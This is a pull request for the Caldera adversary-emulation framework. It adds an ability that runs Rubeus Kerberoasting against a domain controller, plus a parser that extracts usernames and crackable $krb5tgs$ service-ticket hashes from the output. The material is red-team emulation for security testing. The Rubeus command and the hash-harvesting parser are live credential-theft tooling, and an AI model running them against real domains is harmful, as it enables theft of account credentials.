### PR TITLE
Feature/rubeus kerberoast adversary

### DIFF
--- a/app/parsers/rubeus_kerberoast.py
+++ b/app/parsers/rubeus_kerberoast.py
@@ -1,0 +1,86 @@
+import re
+from app.objects.secondclass.c_fact import Fact
+from app.objects.secondclass.c_relationship import Relationship
+from app.utility.base_parser import BaseParser
+
+class Parser(BaseParser):
+
+    relationship_sources = []
+
+    def parse(self, blob):
+        """Parse the output from `.\Rubeus.exe kerberoast /simple`
+ 
+        Like:
+               ______        _
+              (_____ \      | |
+               _____) )_   _| |__  _____ _   _  ___
+              |  __  /| | | |  _ \| ___ | | | |/___)
+              | |  \ \| |_| | |_) ) ____| |_| |___ |
+              |_|   |_|____/|____/|_____)____/(___/
+ 
+              v1.5.0
+ 
+ 
+            [*] Action: Kerberoasting
+ 
+            [*] NOTICE: AES hashes will be returned for AES-enabled accounts.
+            [*]         Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.
+ 
+            [*] Searching the current domain for Kerberoastable users
+ 
+            [*] Total kerberoastable users : 1
+ 
+            $krb5tgs$23$*svc-sql$acme.org$MSSQL/sql1.acme.org:1443*$77A12FE66A1[...truncated...]
+        """
+        relationships = []
+        username = None
+        tgs_hash = None
+
+        lines = blob.replace('\r\n', '\n').split('\n')
+        i = 0
+        while i < len(lines):
+            line = lines[i].strip()
+            # Extract username
+            if line.startswith('[*] SamAccountName'):
+                # e.g. [*] SamAccountName         : jli
+                username = line.split(':', 1)[-1].strip()
+            # Extract hash (may be multi-line)
+            elif line.startswith('[*] Hash'):
+                # The hash starts after the colon
+                hash_line = line.split(':', 1)[-1].strip()
+                tgs_hash_lines = [hash_line] if hash_line else []
+                # Collect subsequent indented lines as part of the hash
+                j = i + 1
+                while j < len(lines):
+                    next_line = lines[j]
+                    # Stop if the next line is not indented or is empty
+                    if not next_line.startswith(' ') and not next_line.startswith('\t'):
+                        break
+                    tgs_hash_lines.append(next_line.strip())
+                    j += 1
+                tgs_hash = ''.join(tgs_hash_lines)
+                i = j - 1  # Move i to last hash line
+            i += 1
+
+        # Validate extraction
+        if username and tgs_hash and tgs_hash.startswith('$krb5tgs$'):
+            relationships.extend(self.create_relationships(username, tgs_hash))
+
+        return relationships
+
+    def create_relationships(self, source_value, target_value):
+        relationships = []
+        for mp in self.mappers:
+            source_fact_search = [fact for fact in self.relationship_sources
+                                  if fact.trait == mp.source and fact.value == source_value]
+            if source_fact_search:
+                source_fact = source_fact_search[0]
+            else:
+                source_fact = Fact(mp.source, source_value)
+                self.relationship_sources.append(source_fact)
+            relationships.append(
+                Relationship(source=source_fact,
+                             edge=mp.edge,
+                             target=Fact(mp.target, target_value))
+            )
+        return relationships

--- a/data/abilities/credential-access/2797bb09-3b49-4295-b5da-26333bf0b61d.yml
+++ b/data/abilities/credential-access/2797bb09-3b49-4295-b5da-26333bf0b61d.yml
@@ -1,0 +1,36 @@
+- tactic: credential-access
+  technique_name: Steal or Forge Kerberos Tickets Kerberoasting
+  technique_id: T1558.003
+  name: Kerberoast Rubeus
+  description: Request Kerberos service tickets for all SPNs with Rubeus
+  executors:
+  - name: cmd
+    platform: windows
+    command: '".\Rubeus.exe kerberoast /domain:#{remote.host.fqdn} /dc:#{remote.host.ip}"'
+    code: null
+    language: null
+    build_target: null
+    payloads: []
+    uploads: []
+    timeout: 60
+    parsers:
+    - module: plugins.stockpile.app.parsers.rubeus_kerberoast
+      parserconfigs:
+      - source: domain.user.name
+        edge: has_crackable_tgs
+        target: domain.user.crackable_tgs
+        custom_parser_vals: {}
+    cleanup: []
+    variations: []
+    additional_info: {}
+  requirements: []
+  privilege: Elevated
+  repeatable: false
+  buckets:
+  - credential-access
+  additional_info: {}
+  access: {}
+  singleton: false
+  plugin: stockpile
+  delete_payload: true
+  id: 2797bb09-3b49-4295-b5da-26333bf0b61d

--- a/data/abilities/credential-access/2797bb09-3b49-4295-b5da-26333bf0b61d.yml
+++ b/data/abilities/credential-access/2797bb09-3b49-4295-b5da-26333bf0b61d.yml
@@ -1,4 +1,5 @@
 ---
+
 - tactic: credential-access
   technique_name: Steal or Forge Kerberos Tickets Kerberoasting
   technique_id: T1558.003

--- a/data/abilities/credential-access/2797bb09-3b49-4295-b5da-26333bf0b61d.yml
+++ b/data/abilities/credential-access/2797bb09-3b49-4295-b5da-26333bf0b61d.yml
@@ -1,3 +1,4 @@
+---
 - tactic: credential-access
   technique_name: Steal or Forge Kerberos Tickets Kerberoasting
   technique_id: T1558.003

--- a/data/adversaries/1ef21846-a4d4-49df-a140-66f9ab27a05f.yml
+++ b/data/adversaries/1ef21846-a4d4-49df-a140-66f9ab27a05f.yml
@@ -1,0 +1,8 @@
+---
+
+
+id: 1ef21846-a4d4-49df-a140-66f9ab27a05f
+name: "Kerberoast Rubeus"
+description: Rubeus based Kerberoasting steps for T1558.003
+atomic_ordering:
+  - 2797bb09-3b49-4295-b5da-26333bf0b61d

--- a/data/sources/6cf9a926-177d-480d-927d-9b44ee72f95a.yml
+++ b/data/sources/6cf9a926-177d-480d-927d-9b44ee72f95a.yml
@@ -1,0 +1,11 @@
+---
+
+id: 6cf9a926-177d-480d-927d-9b44ee72f95a
+name: Kerberoast Rubeus
+facts:
+  - trait: remote.host.fqdn
+    value: CHANGEME
+  - trait: remote.host.ip
+    value: CHANGEME
+rules: []
+relationships: []


### PR DESCRIPTION
## Description

Adds support for the T1558.003 Kerberoasting technique through Rubeus:
New Stockpile ability YAML under data/abilities/credential-access/2797bb09-3b49-4295-b5da-26333bf0b61d.yml
New adversary profile YAML under data/adversaries/1ef21846-a4d4-49df-a140-66f9ab27a05f.yml
New Fact Source YAML under data/fact_sources/6cf9a926-177d-480d-927d-9b44ee72f95a.yml
New parser module app/parsers/rubeus_kerberoast.py
Puts everything together so that in Caldera UI you can pick “Kerberoast Rubeus” as an adversary and have the operation automatically seed the DC FQDN/IP, run Rubeus, parse the output into domain.user.crackable_tgs

## Type of change

- [X] New feature (non-breaking change which adds functionality)

## How Has This Been Tested?

Seeded Fact Source with placeholder CHANGEME values, then updated to THECOMPANY.ORG / 192.168.100.10. for testing purposes
Launched a Sandcat agent on the Windows VM, ran an Operation using the “Kerberoast Rubeus” adversary.

Verified that:
Parser captured domain.user.name → domain.user.crackable_tgs facts

## Checklist:

- [x] My code follows the style guidelines of this project
- [x] I have performed a self-review of my own code
- [x] I have made corresponding changes to the documentation
- [ ] I have added tests that prove my fix is effective or that my feature works
